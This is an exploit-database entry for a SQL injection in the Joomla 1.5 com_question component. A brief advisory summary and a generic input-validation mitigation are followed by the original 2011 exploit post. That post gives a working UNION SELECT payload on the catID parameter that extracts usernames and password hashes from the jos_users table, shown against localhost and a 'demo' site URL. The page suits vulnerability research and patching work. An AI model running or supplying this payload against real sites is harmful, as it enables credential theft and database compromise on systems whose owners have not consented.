Joomla (com_question) SQL Injection Vulnerability

vendor:

Joomla

by:

NeX HaCkEr

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla

Affected Version From: Joomla 1.5

Affected Version To: Joomla 1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2011

Joomla (com_question) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the HTTP request. This can allow an attacker to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

###################################################
# |Title   : Joomla  (com_question) SQL Injection Vulnerability
# |Vendor  : http://www.alex-ensdorf.de/
# |Version : Joomla 1.5 
# |Date    : 15/5/2011
# |Author  : NeX HaCkEr
# |Contact : Error_log@hotmail.com
##################################################
# | Exploit :
# | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]
# | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all     
# | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Demo:
# | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 
##################################################
# | Greetz :
# | Dr.KAsBeR & DaShEr & MaFiA & WeeD 
##################################################